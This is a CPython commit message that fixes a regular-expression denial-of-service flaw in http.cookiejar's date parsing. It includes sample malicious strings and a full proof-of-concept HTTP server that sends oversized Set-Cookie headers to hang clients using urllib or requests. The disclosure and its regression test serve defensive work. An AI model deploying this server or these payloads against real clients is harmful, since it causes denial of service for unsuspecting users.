python/cpython

Permalink

  1. bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (GH-17345)

    The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
    expression denial of service (REDoS).
    
    LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
    to parse Set-Cookie headers returned by a server.
    Processing a response from a malicious HTTP server can lead to extreme
    CPU usage and execution will be blocked for a long time.
    
    The regex contained multiple overlapping \s* capture groups.
    Ignoring the ?-optional capture groups the regex could be simplified to
    
        \d+-\w+-\d+(\s*\s*\s*)$
    
    Therefore, a long sequence of spaces can trigger bad performance.
    
    Matching a malicious string such as
    
        LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
    
    caused catastrophic backtracking.
    
    The fix removes ambiguity about which \s* should match a particular
    space.
    
    You can create a malicious server which responds with Set-Cookie headers
    to attack all python programs which access it e.g.
    
        from http.server import BaseHTTPRequestHandler, HTTPServer
    
        def make_set_cookie_value(n_spaces):
            spaces = " " * n_spaces
            expiry = f"1-c-1{spaces}!"
            return f"b;Expires={expiry}"
    
        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                self.log_request(204)
                self.send_response_only(204)  # Don't bother sending Server and Date
                n_spaces = (
                    int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                    if len(self.path) > 1 else
                    65506  # Max header line length 65536
                )
                value = make_set_cookie_value(n_spaces)
                for i in range(99):  # Not necessary, but we can have up to 100 header lines
                    self.send_header("Set-Cookie", value)
                self.end_headers()
    
        if __name__ == "__main__":
            HTTPServer(("", 44020), Handler).serve_forever()
    
    This server returns 99 Set-Cookie headers. Each has 65506 spaces.
    Extracting the cookies will pretty much never complete.
    
    Vulnerable client using the example at the bottom of
    https://docs.python.org/3/library/http.cookiejar.html :
    
        import http.cookiejar, urllib.request
        cj = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        r = opener.open("http://localhost:44020/")
    
    The popular requests library was also vulnerable without any additional
    options (as it uses http.cookiejar by default):
    
        import requests
        requests.get("http://localhost:44020/")
    
    * Regression test for http.cookiejar REDoS
    
    If we regress, this test will take a very long time.
    
    * Improve performance of http.cookiejar.ISO_DATE_RE
    
    A string like
    
    "444444" + (" " * 2000) + "A"
    
    could cause poor performance due to the 2 overlapping \s* groups,
    although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
    
    (cherry picked from commit 1b779bf)